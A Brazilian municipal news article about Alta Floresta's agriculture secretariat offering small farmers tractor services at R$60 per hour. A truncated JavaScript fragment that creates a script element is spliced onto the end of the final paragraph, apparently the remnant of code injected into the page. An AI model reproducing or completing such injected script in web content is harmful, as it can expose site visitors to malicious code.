Capa / Cidades / Secretaria de Agricultura atende produtores rurais com serviço

Secretaria de Agricultura atende produtores rurais com serviço

31-03-2016-Secretaria de Agricultura atende produtores rurais com serviço de trator (2)Giselle Oliveira
Assessoria da PMAF

A Prefeitura de Alta Floresta por meio da Secretaria Municipal de Agricultura, Pecuária e Desenvolvimento, continua a todo vapor com o atendimento aos produtores rurais, com o serviço de trator com grade, calcareadeira e roçadeira. Antes o atendimento era realizado com apenas um trator e agora com mais dois tratores, oferece mais agilidade para atender uma quantidade maior de produtores.
Frente à pasta desde fevereiro de 2015, Aparecida Sicuto, acompanhou nesta quinta-feira (31.03), em uma chácara na Vila Rural os trabalhos juntamente com o supervisor Agrícola, Alex Cardozo, as atividades da Secretaria de Agricultura.
O trabalho propiciado pela pasta é realizado em propriedades e chácaras próximas ao perímetro urbano, o principal objetivo é auxiliar os trabalhos no campo, dentre os atendidos estão produtores de maracujá, milho, mandioca, melancia, hortaliças, dentre outros.
Alex Cardoso, explica que a pasta cobra uma taxa de R$ 60,00 por hora de serviço, o valor serve para aquisição de combustível do trator, após o serviço executado o produtor vai à secretaria, para emissão do boleto que pode ser paga em casa lotérica ou instituição bancária.
Vale destacar que a Secretaria de Agricultura atende os pequenos produtores rurais e este trabalho é disponibilizado para propriedade de até três alqueires, preferencialmente próximos à cidade, dentre os setores atendidos estão a comunidade Centralzinha, Guadalupe, Santíssima Trindade, Jardim Panorama, bairro Boa Nova e Cidade Alta.
Segundo a secretária Aparecida Sicuto, desde que assumiu a pasta em fevereiro passado, foram realizados em média 25 por mês. “O produtor interessado deve procurar o supervisor agrícola para fazer o agendamento, agora com dois tratores ajuda bastante para aumentar esse atendimento aos produtores”, mesmo com o período de chuvas, chegamos a uma média de 325 atendimentos durante este período de 13 meses, completa.
Sicuto destaca que esse é um dos trabalhos desenvolvidos pela secretaria Agricultura, visando o fortalecimento da agricultura familiar, auxiliando o pequeno produtor rural, são serviços como gradeamento e limpeza da área para plantar principalmente mandioca e hortaliças, que são vendidas na Feira Livre e outros pontos pelos produtores.
Para mais informações sobre os serviços de trator e agendamento basta procurar a Secretaria Municipal de Agricultura, Pecuária e Desenvolvimento, de segunda à sexta-feira, das 07h ás 13h.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top